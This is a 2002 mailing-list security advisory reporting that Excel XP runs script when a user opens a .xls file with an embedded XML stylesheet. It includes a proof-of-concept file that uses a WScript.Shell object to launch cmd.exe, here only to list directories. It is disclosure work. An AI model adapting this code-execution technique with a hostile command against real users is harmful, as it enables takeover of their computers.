Excel XP xml stylesheet problems

From: Georgi Guninski (guninski@GUNINSKI.COM)
Date: 05/24/02


Date:         Fri, 24 May 2002 20:57:41 +0300
From: Georgi Guninski <guninski@GUNINSKI.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Georgi Guninski security advisory #55, 2002

Excel XP xml stylesheet problems

Systems affected: Excel XP
Risk: Low (user interaction required)
Date: 24 May 2002

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Anything in this document may change without notice.

Interesting news:
According to
http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
"...He (MS) later acknowledged that some Microsoft code was so flawed
it could not be safely disclosed..."
LOL
They call this trusthworthy??????

Description:

Excel XP tries to play with new technologies like XML and XSLT.
Unfortunately the Excel seem "so flawed" that if the user
opens a .xls file and chooses to view it with xml stylesheet arbitrary code
may be executed. As script kiddies know this may lead to taking full control
over user's computer. Excel does not give any warning to the user - just asks
whether to use the style sheet or not. The default option is *not* to
display with the stylesheet though.

Details:

Consider this xls file
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------

It contains both XML and a stylesheet in one file.

Workaround/Solution:
Do not choose to use xml stylesheets in Excel if asked.
poweroff(8) the poor windoze box if you see Excel mentions stylesheets.

Vendor status: microsoft was notified on 23 May 2002

Regards,
Georgi Guninski
http://www.guninski.com